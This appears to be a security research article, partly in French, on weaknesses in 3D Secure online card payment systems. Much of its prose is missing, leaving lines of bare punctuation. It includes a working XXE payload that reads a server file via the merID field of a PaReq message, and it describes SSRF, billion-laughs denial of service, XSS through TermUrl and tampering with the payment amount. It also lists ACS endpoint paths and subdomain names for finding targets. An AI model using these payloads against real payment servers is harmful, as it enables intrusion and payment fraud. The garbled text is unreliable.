3D Secure, ou ce que cachent les mécanismes de sécurité des paiements en ligne



Le commerce électronique est l'un des domaines les plus importants et à la croissance la plus rapide et attire donc l'attention à la fois des chercheurs en sécurité de l'information et des cybercriminels. Par conséquent, je voudrais comprendre certains aspects des mécanismes de sécurité utilisés lors de la réalisation de paiements en ligne.



, - — 3D Secure. , XML , (card not present payment). VISA , (Master Card, JCB International, AmEx, ), VISA EMV. EMV 3DS.



3D Secure ?



— Three Domain Secure.

— , .

— , .

(interoperability domain) — , (, , ) 3D Secure. , (merchant plug-in), (access control server) .



?



3D Secure .

« ». , -. (), .. 3D Secure .



: - .

3DS, .



3D Secure



v1.0 - 2001  -…
v2.0 - 2014  - 
v2.1 - 2017 
v2.2 - 2018 


1.0.2 CNP-, OTP-.

1.0.2 2001 .



v2.2, EMV , 2020- .



?



Image



, 3DS.



, , .



?



, , — , ( ) -, 3DS. -.



PaiementFlow



1 — "". MPI-, .



(MPI) , , CRReq- (Card Range Request). , - CRR . .



MPI VeReq (Verification Request). - , 3DS .



VeRes (Verification Response) .



.



2 — MPI PaReq (Payment Request) — . .



PaReq OTP-.



3 — OTP- . - MPI PaRes (Payment Response), .



?



CRReq/CRRes . VeReq/VeRes .



<?xml version="1.0" encoding="UTF-8"?>
<ThreeDSecure>
  <Message id="999">
    <VEReq>
      <version>1.0.2</version>
      <pan>4444333322221111</pan>
      <Merchant>
        <acqBIN>411111</acqBIN>
        <merID>99000001</merID>
        <password>99000001</password>
      </Merchant>
      <Browser>
        <deviceCategory>0</deviceCategory>
        <accept>*/*</accept>
        <userAgent>curl/7.27.0</userAgent>
      </Browser>
    </VEReq>
  </Message>
</ThreeDSecure>


VeReq , PAN .



<?xml version="1.0" encoding="UTF-8"?>
<ThreeDSecure>
  <Message id="999">
    <VERes>
      <version>1.0.2</version>
      <CH>
        <enrolled>Y</enrolled>
        <acctID>A0fTY+pKUTu/6hcZWZJiAA==</acctID>
      </CH>
      <url>https://dropit.3dsecure.net:9443/PIT/ACS</url>
      <protocol>ThreeDSecure</protocol>
    </VERes>
  </Message>
</ThreeDSecure>


VeRes message id, , . status enrolled , .

URL-. , ACS PaReq.



Pareq



, , , . , , . , . PaReq.



URL: https://site.ru/acs/pareq

MD=5ebde4d3-3796-7a4d-5ebd-e4d300003dd0&PaReq=eJxVUstywjAM%2FBUm98QPDDiMcIc2dMoh0AedKb2ljiDpNAFMUgJfXzuFPnzSrjQraWW4aoqPzieafb4pRx4LqNfBUm%2FSvFyPvOfFrS%2B9KwWLzCBGT6hrgwpi3O%2BTNXbydOS96VDocEX9FePaF1IIPwlF6qeoV7Inqeyh9hTcjx9xp%2BDcSNk%2BAQdygVbR6CwpKwWJ3l1PZ0rwQZ9SIGcIBZpppAaSuse7POwC%2BeagTApUy%2FEsmrwE8Xw2WQJpKdCbuqzMUfWFLb4AqM2HyqpqOyTkcDgExabEY3BMyhSbwNRAXB7I70D3tYv2Vq%2FJUzU7Teg8ejjE7xMWn9Z8Hk35fKEtNx4BcRWQJhUqTplklIoOC4c9NuwOgLQ8JIUbRDHK2vW%2BEWxdk%2FG%2F1F8KrO%2FGnuWyywUBNls7v62wZv7EQH5nvrlzlurKGsUGNOwy0ZfhXf5udlkmV7ey98rfmnjpjG6LnGJubeKUslbSASBOhpxvSM7nt9G%2Fb%2FEFnkK9RA%3D%3D&TermUrl=https%3A%2F%shop.ru%2Fgates%2F3ds


, PaReq ( POST), :

1) MD — . MPI, PaReq PaRes ;

2) PaReq — . ;

3) TermUrl — URL-, 3D Secure.



TermURL MD . ACS, reflected XSS. .



№1: ACS PaReq!



PaReq?

, PaReq. , PaReq — Xml-> zlib-> base64-> urlencode. burp.



PaReq



, PaReq, xml. (purchAmount, amount currency), MessageId ( VeReq).



PaReq ( — PaReq, ), PaRes — , :



PARES



, -, XML- — XXE. !



, , PaReq. ! :



<ThreeDSecure><Message id="poEpShmja0A36YWe0JOyr4Zt"><Error><version>1.0.2</version><errorCode>99</errorCode><errorMessage>Permanent system failure.</errorMessage><errorDetail>Failed to build error message.</errorDetail></Error></Message></ThreeDSecure>

<errorCode>5</errorCode><errorMessage>Format of one or more elements is invalid according to the specification.</errorMessage>

<errorCode>98</errorCode><errorMessage>Transient system failure</errorMessage>

<errorCode>4</errorCode><errorMessage>Critical element not recognized</errorMessage>


ACS. XXE.



XXE



:



<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ThreeDSecure [<!ENTITY ac SYSTEM "file:///proc/sys/kernel/hostname">]><ThreeDSecure><Message id=“123-123-123-123-123-123"><PAReq><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN><merID>&ac;</merID><name>MerchantName</name><country>643</country><url>http://asdas.as</url></Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><amount>202000</amount><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent><desc>AcquirerName</desc></Purchase><CH><acctID>DYasdVQAOX6as3dfcxccwzPCR6Q74eS5</acctID><expiry>2209</expiry></CH></PAReq></Message></ThreeDSecure>


acqBIN, merID, xid, date, purchAmount currency PaRes. ACS, , merID. .



( ) — URL. , . XXE.



. ACS , , PaRes error merID. , PaReq , :



<ThreeDSecure><Message id=" 123-123-123-123-123-123 "><PARes id=" 123-123-123-123-123-123 "><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN>
<merID>ACS server name</merID>
</Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent></Purchase><pan>000000000000000</pan><TX><time>20181004 21:34:21</time><status>U</status></TX><IReq><iReqCode>55</iReqCode><iReqDetail>PAReq.CH.acctID</iReqDetail></IReq></PARes></Message></ThreeDSecure>


URL DNS HTTP- . — DOS XXE- "billion laughs" ( ).



?



URL-:



/acs/pareq/___uid___
/acspage/cap?RID=14&VAA=B
/way4acs/pa?id=____id____
/PaReqVISA.jsp
/PaReqMC.jsp
/mdpayacs/pareq
/acs/auth/start.do


:



acs
3ds
3ds
secure
cap
payments
ecm
3dsauth
testacs
card


, .

- , proxy interceptor .



3D Secure v 2. *



, 3DS v1.0 .



, . , , , .. ACS .



Dispositifs



3DS 2.0 3DS SDK.



, . . , , , .



, . , 3DS OTP. v2 .



types d'authentification



v1.0. , , !



.



3D Secure v2?



3ds 2



. .



— Risk Engine. 1.0.2 , OTP. 2. * .



v2



3ds 2 schématique



, , , 2- . Risck Engine, ( ), ( 3DS SDK).



, 2- . , , , .



?



3ds 2



AReq (base64url) , .

, , AReq . , , : . , )



.

, Risk Engine , OTP-.



?



CReq (base64url json) — challenge request — , , ARes Challenge Flow.



{
"ThreeDSServerTransID": "8a880dc0-d2d2-4067-bcb1-b08d1690b26e",
"AcsTransID": "d7c1ee99-9478-44a6-b1f2-391e29c6b340",
"MessageType": "CReq",
"MessageVersion": "2.1.0",
"SdkTransID": "b2385523-a66c-4907-ac3c-91848e8c0067",
"SdkCounterStoA": "001"
}


3D Secure SDK, (JWE).



CReq :



paramètres creq



, 2- 3DS, , . , .





( )



v1



  • XXE Pareq:

    • DOS
    • ssrf
  • XSS TermUrl
  • Blind XSS —
  • Pareq , ! , .. , 100 1.


v2



  • Blind XSS —
  • Challenge flow, …


, , , 3DS SaaS. , , -.





https://github.com/w3c/webpayments/wiki

https://www.EMV.com/emv-technologies/3d-secure/

https://3dsserver.netcetera.com/3dsserver-saas/doc/current/schema/3ds-api.html

https://github.com/webr0ck/3D-Secure-audit-cheatsheet



P.S. , : " AliExpress, Amazon, , OTP . 3DS?" , . , .




All Articles